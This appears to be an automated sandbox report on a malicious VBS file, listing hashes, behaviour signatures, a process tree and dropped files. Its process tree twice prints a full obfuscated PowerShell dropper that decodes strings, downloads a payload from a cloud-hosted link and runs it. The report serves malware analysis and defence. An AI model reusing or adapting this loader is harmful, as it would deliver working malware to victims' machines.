Analysis

  • max time kernel
    141s
  • max time network
    137s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240412-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24-04-2024 04:45

General

  • Target

    G4-TODOS.vbs

  • Size

    8KB

  • MD5

    0894754b81c21bfa79481c3940d134d5

  • SHA1

    381352cd7b6551606bfb8c07cd77d7c50ffe41cc

  • SHA256

    0d456eedf9663741ffc712deadd8f8960e711b68de8b198ec1aec9dc4e3279d4

  • SHA512

    ea8fb60de2b0c6f67c2473963348a505fc031e8e361eae051d3a8efdd1a63984c5fe06c4b832a906c76a590c2346bdf19de39a5d5965d1961bee20e421c2f06b

  • SSDEEP

    192:jVNOLlEuLpGIxZX2ufM8Nft3fIlikQNJtuMsVU3UbyWzR6zaSLE2mM8ggQTGOKPd:pNOLlEbIxZX2uf9NVQlikQPtsekbyWzx

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\G4-TODOS.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4852
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Utmmeligheds = 1;$Skimme='Substrin';$Skimme+='g';Function Fritidsmuligheds($Udrejseforbuddene){$Valetism=$Udrejseforbuddene.Length-$Utmmeligheds;For($Syring=5; $Syring -lt $Valetism; $Syring+=(6)){$Fundamentalismen+=$Udrejseforbuddene.$Skimme.Invoke($Syring, $Utmmeligheds);}$Fundamentalismen;}function Exuberate($Lavrss){&($Arbejdsvrelser) ($Lavrss);}$Flokkede=Fritidsmuligheds ' FeltM DumpoholdfzTorreiDdsfjl Ihukl.ennaa trol/Hydro5 Byst.Mosdy0,yrin Hoved(KrydsWModerinat.inHvntrdFagopoHapt wIndves Si.e SprinNbakkeTAfsyn Smukk1Spids0 Flue. Garg0Coper;Le.te KahiWBr.ndiIodo.nYndet6 uls4nonco;Heire s.inkxSynsh6 Bier4Lgeu ; Kara BojsdrAktievP.ege:Krige1Tan.p2Ha.de1Overm.Enhus0Propi) tage NargiGStilheEg,trcDclasken,osoSvnig/Tykm.2Svang0Oks,p1Parac0para.0G.lva1 Bull0Jasmi1Over. DikerF badeiConcer Bra,eUnderfDepaiobyggexTange/ Unis1Pharm2 Atr.1 Tj n. hens0Homop ';$Medicopsychological=Fritidsmuligheds ' BeflUAgi,ns Lac eOve,frPolya-apoteAWardegtre ceSa,kenPo.tot,wist ';$Infection=Fritidsmuligheds ',ingmhModhat afmgtdissop cilis Au,o:Flamb/ Seku/ ,elnd ExtrrUds,yiParagv Pseue Fati.drowngEvighoBr.ttoOrg,ngKrakelMikroeUndep.Fo micAffaloPanermWe eg/Van buTiresc Usrp?DecoleP.enyx An.lpProduoFootlrSpooftBaand= Slutdch.huoFo,skwBeic,n ForhlPictoo.uropaLagridopsam&VindeiCommedMissi=Upbla1John,HColdnPRavnembetjeR Ber WKn.glX nstedTrforwTrninNCarioI Trbe6SportXCount5 vvefgErhveYskuess SweemColpeIH,len9KandivSign.6TarmreSkimoKCo,ciJTvangz BegiI Entrt Met,1BugleGA gel-retretprog.t erve ';$Noncombustible173=Fritidsmuligheds 'Botet>Trskn ';$Arbejdsvrelser=Fritidsmuligheds 'SelviiSupereIn skxBredb ';$Museumsgenstande='Haplessnesses';Exuberate (Fritidsmuligheds 'RustfSR ppeeUnquotPa,as-LnforCReubeoSmovsntranstTweene CostnBesantScler Ejnar-ElectPUnaddaLobeltFlusthAfhng ilitTNeigh:Unlar\ Gul S,oninoBeha,mAheyrbTriale .remrPestii footsreno.hGylte. Nutlt V.luxDa.nitCigar Mi.k- Rt sVLindaaSta.nlCavalu IliaeFun,t Godmo$ UltrMHim eu.affesKlarleDelf uEkspamSalams LommgBencheHnsesn resisL,mbetClevea PatenSteridPistoeScrei;Su,fe ');Exuberate (Fritidsmuligheds ' a,niiDendrfFortr I.raf(ElefatUnspieSki.dsTermitTid,e-Li iepSmiggaTal ht Overh Gulv u,teT Rors:T.aum\ScarlSflyttoTilhymCame,bUnc,aeHaandrSyri.iTer is UhaahBiory.Retint lumixProbit Rrlg) Expi{ConcleRedbuxf.deri GalmtC.ort} Ledd;.ksam ');$chaussebrolgningens = Fritidsmuligheds 'chan.erenticWh.elhmyarioO ist Fibr%Lgnera edlgpGrsropMyrekdKapitaLivsvtGrapla,utde%Capen\QuinoCSadacostrmhl Bahue SnniosummapAns,atBengniEtchilInc.nuo.eramMoudi.SordiUSlagtnVkstrwstran Despo& hjl&Heter peakeMetamcharmohStumpoGhost .eapf$Sepul ';Exuberate (Fritidsmuligheds ' itch$ afrigNeotel FejloKu,esbSen,eaUnspilsams,:OprreS SiveuFandapRecogpPregelPistei Sk,nc SionaVerdetHalvfeun.il= M dn(Inddacmytilm SkoldStilg M nha/FortrcAnted U.gdo$TrretcSprouhSkilbalamm,u A emsE entsSkaaremudpubTmre,rVellooUnderl BeebgSp,eanordknibuld nxanthgshptse nfignResissop rd)Irrit ');Exuberate (Fritidsmuligheds 'Laane$D.sbrgFro.elOversoh.mogbStathaKnuselCenti:UpbuofOliedoHolderUnw re .pornArbu o,imstosupernHofjg= .add$.erceIBaktenwoodsfBortfeG,ptacTiptit LateiSkarloExtran Ab o. S.elsTomogpunquilMilitiEkstrtPotla(Hemih$,rnseN,arato Kn,pnFy decStilloSknh m.anpibCarpeu PharsUdfritFazelidobbeb nklilForhaeUngen1Foofa7.abbi3F.izz)Ectro ');$Infection=$forenoon[0];Exuberate (Fritidsmuligheds 'Anita$ metyg DrkilB endoSolenbAdapta Wom.l hung:SstjeM.dusti BrndkRip arNucleoFlagef askioUnyconCasheiNar.gs Vis kr.dia=.esteNPincheIndkawMeth.-Obse.OSvejsbCharkjPrecaeF,natc InvatEchin Die.SFordkyBioc.s Brost reageChickmConve.uncolNFagvieUnnartUjvn,.ColloW otawe bestb Fr,mCTekstlForbei S.ske SkalnE,tert H,rn ');Exuberate (Fritidsmuligheds 'Belli$KatteMBl,dei nsuskEditar NskeoSulkafScotto StoknSprini,vistsSul.okRecon. V ldHHer keCrassa StordLn roe,eclirRef rsLeuk [ Camp$OktobM UgeseEelbldBahadi urokcSelskoHotbrp .ogrsAimblyPrciscSpirah ,atto Co kl Monoo MalegHep ti ParacTransa TubelInsin],aneb=Uforu$Paul.FLuteol Tu coLeadikPeachkEstheeGalacdTid,peRecit ');$Besynderligeres=Fritidsmuligheds 'EncepM enstiCountkHalssrP,atio SvejfPolluo Mal.nIsoceisonlys ammekSarco.SociaDFnge.oCon twNonlin nsollUnn goBiu.ia Skjod Na sF eleciKa,asl .utieVirak(tardy$.ndiaIC,ryinPrsidf Eftee ,unacSociat CrimiBrddeo ongsnBefat, un e$ SparD Flora KlintKl.ddaPhospfPeriaoGunn rGutiemSteriaSar,btscotts mino)Nedhn ';$Besynderligeres=$Supplicate[1]+$Besynderligeres;$Dataformats=$Supplicate[0];Exuberate (Fritidsmuligheds 'Lavry$.ewingPaprilRetsvoBl wfbDr.esaHalvfl Bul,:GrahaCDogeah un ea.oders liqueE.antdUnder1 Gas.8 .upe0D,tai=Journ(StonyT OrddeSweetsVg est,bser-ProloPerythaEuropt .elihPo sy gril$UnsorDSal,aaDu,metFamilaFa,etfAmyl,oProphrLoamimArvebaApicut PantsEno.i).cety ');while (!$Chased180) {Exuberate (Fritidsmuligheds 'Faare$NoningOpe.olBesnroLegemb Fo,la OmkrlSolde: FravZProacyIndirm,anguobalail,osseoInscrgInteri KnipeFathmsAp.ci=Aceti$OutwatChri rWhir uNord.eDoser ') ;Exuberate $Besynderligeres;Exuberate (Fritidsmuligheds 'BisamS PhostR steaArchbrCo.totKnald-sttteSPlan lMul teSminkeLsgngpGrund Anhal4Pala. ');Exuberate (Fritidsmuligheds 'Lgten$Squirg ,evil DataoAria bLa.tsa BakelKalkb:Ch.ckCBathth F,oraMisbisKaleieMi bedE,ter1 Afh 8Maksi0,anch=.ubpr(b,dwaTTri ue SystsFaks trekla-RaadiP Par aSh edtMorfih Mala Unpre$NeuraDFridaaoutqutKneppa.achifMelleoCoenar SeismCabbaaCon,itExampsCi at)Laese ') ;Exuberate (Fritidsmuligheds 'Bybli$ SorbgSladdl ovehoQuestbCoveraChi,ilHillo:NvnviE BryokC nsosMiljbpJed.oeT,lserRep,rtEup ogHektorTyphouTa.sepSten,pPhongeAceta=Typer$Or.ergIns,tl Disso rbeb menuaAudiolCrouk:C.ltuLIdepoyanacrdKoncishaandiLeanbd BalleI dusrDeinknSkudse.ircu+Elvrk+Phone%elevh$KreatfHj peoPamphrCausee ,olinVuggeoCoatdoFemtinDekup.WholecFemaloIndleuunsp,n invotFau.e ') ;$Infection=$forenoon[$Ekspertgruppe];}Exuberate (Fritidsmuligheds ' Pre,$Bladkg Jernl,nisookneelbKommeayuquilbu ka:BastaBLmmellFuroroMellekFilhaeTre,cr MisskMola l.dermrRetniiTrivin Phryg otoneSydamrTimmenPreemeUnmo,sRelat Kode =Ty,ef shruGChriseP.moltSilen-RegnbCFilstoIndusn Hea t.mertePer,inModert S,ri Naian$Pa,hrD UncoaPul.etA.orpa Fin fNoncioParchr Untim Ca,iaUdskrtA,skasMove. ');Exuberate (Fritidsmuligheds 'Skrat$knowlg Livvl Af,ooLegi bElgenaFarvel gter:grundFTa.araMatthrForflrMaskaiAr ejeKartorsinatiLimp,e Fj.rs rila Frdig=Dyknd eleg[BureaS O eryTectos hacotBegiveHydrom.atak.OppiaCKloakosolsenKnopsvUndereV.difrUnw.atForly]B vua:S,aae:MisdeFKighorHalvkoFang.mSchavBSmalsa,umeasMensueMetal6Fos,i4MasseSPor,atNonser IdgaiStat,nVinbjg Tuml(We ld$,ogplBSv vll F lno TosdkT,tere CoefrTitankSsterlInfatr A,piiChalcn ,utsg IrraeTrikor AilenIntraeCentrsPersi)Spidv ');Exuberate (Fritidsmuligheds 'Ugeln$AntirgUnslelF,steoBrac,bheelmaLakfalProfe: PaucPUforahGonosiVa.gflTh usoCantamSy onyNonextC.eckhMa,kriFrk pcFrpe ,eind=K,gni Aarsr[MeasuSHaandyUnders V.rdtWat,reBowbam Lov..S,lndTsleuteC.utixUdda,t nben.KreolE Can n No,pcMistaoUn.rodHusbaiBefoonSemidgMordv] Nitr:Rr an:UnfraAPrat SEmigrCTekstIFdestIGrave.Muff,GRectieAbusetKoreoSQuie.tco,alr mejsi HulknBarkegFlatl(Preco$Laur F Aquea CresrAnstir gjeniKontoeGvererxeropi .rndeHermosSpre.)Loplu ');Exuberate (Fritidsmuligheds 'Machi$ unelg,eendlMorseoRegiobNeuroabutt.l Inca: CornKOb ucoFl,brnAwhirk outcuPolyprA ronrBesmoePointrPrehaeTranstIndsb=Beki $ BonkPSubinhOversiVirkslSubstoSolatmg oinyFladtttin.mh flaiTheoscSkamf.Afg ssVi.giuHyp,cbSl,tssTrke,tskrhara.basiKonsenMor,egU,ryd(Svmme2frise9 .ksm8Epica1Comel0 Vild5 Begr,Mab n2genne8Overm5 hilp0typis0Smalh) erne ');Exuberate $Konkurreret;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3732
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Coleoptilum.Unw && echo $"
        3⤵
          PID:4828
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Utmmeligheds = 1;$Skimme='Substrin';$Skimme+='g';Function Fritidsmuligheds($Udrejseforbuddene){$Valetism=$Udrejseforbuddene.Length-$Utmmeligheds;For($Syring=5; $Syring -lt $Valetism; $Syring+=(6)){$Fundamentalismen+=$Udrejseforbuddene.$Skimme.Invoke($Syring, $Utmmeligheds);}$Fundamentalismen;}function Exuberate($Lavrss){&($Arbejdsvrelser) ($Lavrss);}$Flokkede=Fritidsmuligheds ' FeltM DumpoholdfzTorreiDdsfjl Ihukl.ennaa trol/Hydro5 Byst.Mosdy0,yrin Hoved(KrydsWModerinat.inHvntrdFagopoHapt wIndves Si.e SprinNbakkeTAfsyn Smukk1Spids0 Flue. Garg0Coper;Le.te KahiWBr.ndiIodo.nYndet6 uls4nonco;Heire s.inkxSynsh6 Bier4Lgeu ; Kara BojsdrAktievP.ege:Krige1Tan.p2Ha.de1Overm.Enhus0Propi) tage NargiGStilheEg,trcDclasken,osoSvnig/Tykm.2Svang0Oks,p1Parac0para.0G.lva1 Bull0Jasmi1Over. DikerF badeiConcer Bra,eUnderfDepaiobyggexTange/ Unis1Pharm2 Atr.1 Tj n. hens0Homop ';$Medicopsychological=Fritidsmuligheds ' BeflUAgi,ns Lac eOve,frPolya-apoteAWardegtre ceSa,kenPo.tot,wist ';$Infection=Fritidsmuligheds ',ingmhModhat afmgtdissop cilis Au,o:Flamb/ Seku/ ,elnd ExtrrUds,yiParagv Pseue Fati.drowngEvighoBr.ttoOrg,ngKrakelMikroeUndep.Fo micAffaloPanermWe eg/Van buTiresc Usrp?DecoleP.enyx An.lpProduoFootlrSpooftBaand= Slutdch.huoFo,skwBeic,n ForhlPictoo.uropaLagridopsam&VindeiCommedMissi=Upbla1John,HColdnPRavnembetjeR Ber WKn.glX nstedTrforwTrninNCarioI Trbe6SportXCount5 vvefgErhveYskuess SweemColpeIH,len9KandivSign.6TarmreSkimoKCo,ciJTvangz BegiI Entrt Met,1BugleGA gel-retretprog.t erve ';$Noncombustible173=Fritidsmuligheds 'Botet>Trskn ';$Arbejdsvrelser=Fritidsmuligheds 'SelviiSupereIn skxBredb ';$Museumsgenstande='Haplessnesses';Exuberate (Fritidsmuligheds 'RustfSR ppeeUnquotPa,as-LnforCReubeoSmovsntranstTweene CostnBesantScler Ejnar-ElectPUnaddaLobeltFlusthAfhng ilitTNeigh:Unlar\ Gul S,oninoBeha,mAheyrbTriale .remrPestii footsreno.hGylte. Nutlt V.luxDa.nitCigar Mi.k- Rt sVLindaaSta.nlCavalu IliaeFun,t Godmo$ UltrMHim eu.affesKlarleDelf uEkspamSalams LommgBencheHnsesn resisL,mbetClevea PatenSteridPistoeScrei;Su,fe ');Exuberate (Fritidsmuligheds ' a,niiDendrfFortr I.raf(ElefatUnspieSki.dsTermitTid,e-Li iepSmiggaTal ht Overh Gulv u,teT Rors:T.aum\ScarlSflyttoTilhymCame,bUnc,aeHaandrSyri.iTer is UhaahBiory.Retint lumixProbit Rrlg) Expi{ConcleRedbuxf.deri GalmtC.ort} Ledd;.ksam ');$chaussebrolgningens = Fritidsmuligheds 'chan.erenticWh.elhmyarioO ist Fibr%Lgnera edlgpGrsropMyrekdKapitaLivsvtGrapla,utde%Capen\QuinoCSadacostrmhl Bahue SnniosummapAns,atBengniEtchilInc.nuo.eramMoudi.SordiUSlagtnVkstrwstran Despo& hjl&Heter peakeMetamcharmohStumpoGhost .eapf$Sepul ';Exuberate (Fritidsmuligheds ' itch$ afrigNeotel FejloKu,esbSen,eaUnspilsams,:OprreS SiveuFandapRecogpPregelPistei Sk,nc SionaVerdetHalvfeun.il= M dn(Inddacmytilm SkoldStilg M nha/FortrcAnted U.gdo$TrretcSprouhSkilbalamm,u A emsE entsSkaaremudpubTmre,rVellooUnderl BeebgSp,eanordknibuld nxanthgshptse nfignResissop rd)Irrit ');Exuberate (Fritidsmuligheds 'Laane$D.sbrgFro.elOversoh.mogbStathaKnuselCenti:UpbuofOliedoHolderUnw re .pornArbu o,imstosupernHofjg= .add$.erceIBaktenwoodsfBortfeG,ptacTiptit LateiSkarloExtran Ab o. S.elsTomogpunquilMilitiEkstrtPotla(Hemih$,rnseN,arato Kn,pnFy decStilloSknh m.anpibCarpeu PharsUdfritFazelidobbeb nklilForhaeUngen1Foofa7.abbi3F.izz)Ectro ');$Infection=$forenoon[0];Exuberate (Fritidsmuligheds 'Anita$ metyg DrkilB endoSolenbAdapta Wom.l hung:SstjeM.dusti BrndkRip arNucleoFlagef askioUnyconCasheiNar.gs Vis kr.dia=.esteNPincheIndkawMeth.-Obse.OSvejsbCharkjPrecaeF,natc InvatEchin Die.SFordkyBioc.s Brost reageChickmConve.uncolNFagvieUnnartUjvn,.ColloW otawe bestb Fr,mCTekstlForbei S.ske SkalnE,tert H,rn ');Exuberate (Fritidsmuligheds 'Belli$KatteMBl,dei nsuskEditar NskeoSulkafScotto StoknSprini,vistsSul.okRecon. V ldHHer keCrassa StordLn roe,eclirRef rsLeuk [ Camp$OktobM UgeseEelbldBahadi urokcSelskoHotbrp .ogrsAimblyPrciscSpirah ,atto Co kl Monoo MalegHep ti ParacTransa TubelInsin],aneb=Uforu$Paul.FLuteol Tu coLeadikPeachkEstheeGalacdTid,peRecit ');$Besynderligeres=Fritidsmuligheds 'EncepM enstiCountkHalssrP,atio SvejfPolluo Mal.nIsoceisonlys ammekSarco.SociaDFnge.oCon twNonlin nsollUnn goBiu.ia Skjod Na sF eleciKa,asl .utieVirak(tardy$.ndiaIC,ryinPrsidf Eftee ,unacSociat CrimiBrddeo ongsnBefat, un e$ SparD Flora KlintKl.ddaPhospfPeriaoGunn rGutiemSteriaSar,btscotts mino)Nedhn ';$Besynderligeres=$Supplicate[1]+$Besynderligeres;$Dataformats=$Supplicate[0];Exuberate (Fritidsmuligheds 'Lavry$.ewingPaprilRetsvoBl wfbDr.esaHalvfl Bul,:GrahaCDogeah un ea.oders liqueE.antdUnder1 Gas.8 .upe0D,tai=Journ(StonyT OrddeSweetsVg est,bser-ProloPerythaEuropt .elihPo sy gril$UnsorDSal,aaDu,metFamilaFa,etfAmyl,oProphrLoamimArvebaApicut PantsEno.i).cety ');while (!$Chased180) {Exuberate (Fritidsmuligheds 'Faare$NoningOpe.olBesnroLegemb Fo,la OmkrlSolde: FravZProacyIndirm,anguobalail,osseoInscrgInteri KnipeFathmsAp.ci=Aceti$OutwatChri rWhir uNord.eDoser ') ;Exuberate $Besynderligeres;Exuberate (Fritidsmuligheds 'BisamS PhostR steaArchbrCo.totKnald-sttteSPlan lMul teSminkeLsgngpGrund Anhal4Pala. ');Exuberate (Fritidsmuligheds 'Lgten$Squirg ,evil DataoAria bLa.tsa BakelKalkb:Ch.ckCBathth F,oraMisbisKaleieMi bedE,ter1 Afh 8Maksi0,anch=.ubpr(b,dwaTTri ue SystsFaks trekla-RaadiP Par aSh edtMorfih Mala Unpre$NeuraDFridaaoutqutKneppa.achifMelleoCoenar SeismCabbaaCon,itExampsCi at)Laese ') ;Exuberate (Fritidsmuligheds 'Bybli$ SorbgSladdl ovehoQuestbCoveraChi,ilHillo:NvnviE BryokC nsosMiljbpJed.oeT,lserRep,rtEup ogHektorTyphouTa.sepSten,pPhongeAceta=Typer$Or.ergIns,tl Disso rbeb menuaAudiolCrouk:C.ltuLIdepoyanacrdKoncishaandiLeanbd BalleI dusrDeinknSkudse.ircu+Elvrk+Phone%elevh$KreatfHj peoPamphrCausee ,olinVuggeoCoatdoFemtinDekup.WholecFemaloIndleuunsp,n invotFau.e ') ;$Infection=$forenoon[$Ekspertgruppe];}Exuberate (Fritidsmuligheds ' Pre,$Bladkg Jernl,nisookneelbKommeayuquilbu ka:BastaBLmmellFuroroMellekFilhaeTre,cr MisskMola l.dermrRetniiTrivin Phryg otoneSydamrTimmenPreemeUnmo,sRelat Kode =Ty,ef shruGChriseP.moltSilen-RegnbCFilstoIndusn Hea t.mertePer,inModert S,ri Naian$Pa,hrD UncoaPul.etA.orpa Fin fNoncioParchr Untim Ca,iaUdskrtA,skasMove. ');Exuberate (Fritidsmuligheds 'Skrat$knowlg Livvl Af,ooLegi bElgenaFarvel gter:grundFTa.araMatthrForflrMaskaiAr ejeKartorsinatiLimp,e Fj.rs rila Frdig=Dyknd eleg[BureaS O eryTectos hacotBegiveHydrom.atak.OppiaCKloakosolsenKnopsvUndereV.difrUnw.atForly]B vua:S,aae:MisdeFKighorHalvkoFang.mSchavBSmalsa,umeasMensueMetal6Fos,i4MasseSPor,atNonser IdgaiStat,nVinbjg Tuml(We ld$,ogplBSv vll F lno TosdkT,tere CoefrTitankSsterlInfatr A,piiChalcn ,utsg IrraeTrikor AilenIntraeCentrsPersi)Spidv ');Exuberate (Fritidsmuligheds 'Ugeln$AntirgUnslelF,steoBrac,bheelmaLakfalProfe: PaucPUforahGonosiVa.gflTh usoCantamSy onyNonextC.eckhMa,kriFrk pcFrpe ,eind=K,gni Aarsr[MeasuSHaandyUnders V.rdtWat,reBowbam Lov..S,lndTsleuteC.utixUdda,t nben.KreolE Can n No,pcMistaoUn.rodHusbaiBefoonSemidgMordv] Nitr:Rr an:UnfraAPrat SEmigrCTekstIFdestIGrave.Muff,GRectieAbusetKoreoSQuie.tco,alr mejsi HulknBarkegFlatl(Preco$Laur F Aquea CresrAnstir gjeniKontoeGvererxeropi .rndeHermosSpre.)Loplu ');Exuberate (Fritidsmuligheds 'Machi$ unelg,eendlMorseoRegiobNeuroabutt.l Inca: CornKOb ucoFl,brnAwhirk outcuPolyprA ronrBesmoePointrPrehaeTranstIndsb=Beki $ BonkPSubinhOversiVirkslSubstoSolatmg oinyFladtttin.mh flaiTheoscSkamf.Afg ssVi.giuHyp,cbSl,tssTrke,tskrhara.basiKonsenMor,egU,ryd(Svmme2frise9 .ksm8Epica1Comel0 Vild5 Begr,Mab n2genne8Overm5 hilp0typis0Smalh) erne ');Exuberate $Konkurreret;"
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4472
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Coleoptilum.Unw && echo $"
            4⤵
              PID:3156
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 2552
              4⤵
              • Program crash
              PID:1016
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 4472 -ip 4472
        1⤵
          PID:3412

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_axtwp1ce.rvq.ps1
          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • C:\Users\Admin\AppData\Roaming\Coleoptilum.Unw
          Filesize

          425KB

          MD5

          ced110ae799f108ba8dd3020a033596b

          SHA1

          43d40c2ee9c3da906e6a1fcd44992ed06685c637

          SHA256

          e374e8259a203f3c0610d2f18f59b9338f52a6514f635cda5ccf7ca88243c08f

          SHA512

          225a95ebb985bbc313734097f0eaed503352ccbdb9f33894297e4fa8d76d159bed7fe4761df87a004a178daa12f9fc8be16af03f7d9fdcfbbf84fc18d9135f24

        • memory/3732-9-0x0000021EC0430000-0x0000021EC0452000-memory.dmp
          Filesize

          136KB

        • memory/3732-10-0x00007FFB6C9E0000-0x00007FFB6D4A1000-memory.dmp
          Filesize

          10.8MB

        • memory/3732-11-0x0000021EBDA00000-0x0000021EBDA10000-memory.dmp
          Filesize

          64KB

        • memory/3732-12-0x0000021EBDA00000-0x0000021EBDA10000-memory.dmp
          Filesize

          64KB

        • memory/3732-44-0x00007FFB6C9E0000-0x00007FFB6D4A1000-memory.dmp
          Filesize

          10.8MB

        • memory/3732-40-0x00007FFB6C9E0000-0x00007FFB6D4A1000-memory.dmp
          Filesize

          10.8MB

        • memory/4472-31-0x00000000061A0000-0x00000000064F4000-memory.dmp
          Filesize

          3.3MB

        • memory/4472-34-0x0000000007FC0000-0x000000000863A000-memory.dmp
          Filesize

          6.5MB

        • memory/4472-20-0x0000000005960000-0x00000000059C6000-memory.dmp
          Filesize

          408KB

        • memory/4472-23-0x0000000005A40000-0x0000000005AA6000-memory.dmp
          Filesize

          408KB

        • memory/4472-18-0x0000000005AF0000-0x0000000006118000-memory.dmp
          Filesize

          6.2MB

        • memory/4472-32-0x0000000006780000-0x000000000679E000-memory.dmp
          Filesize

          120KB

        • memory/4472-33-0x0000000006820000-0x000000000686C000-memory.dmp
          Filesize

          304KB

        • memory/4472-19-0x00000000058B0000-0x00000000058D2000-memory.dmp
          Filesize

          136KB

        • memory/4472-35-0x0000000006D20000-0x0000000006D3A000-memory.dmp
          Filesize

          104KB

        • memory/4472-36-0x0000000007A40000-0x0000000007AD6000-memory.dmp
          Filesize

          600KB

        • memory/4472-37-0x00000000079A0000-0x00000000079C2000-memory.dmp
          Filesize

          136KB

        • memory/4472-38-0x0000000008BF0000-0x0000000009194000-memory.dmp
          Filesize

          5.6MB

        • memory/4472-17-0x00000000054B0000-0x00000000054C0000-memory.dmp
          Filesize

          64KB

        • memory/4472-16-0x0000000074820000-0x0000000074FD0000-memory.dmp
          Filesize

          7.7MB

        • memory/4472-41-0x0000000074820000-0x0000000074FD0000-memory.dmp
          Filesize

          7.7MB

        • memory/4472-15-0x0000000002E90000-0x0000000002EC6000-memory.dmp
          Filesize

          216KB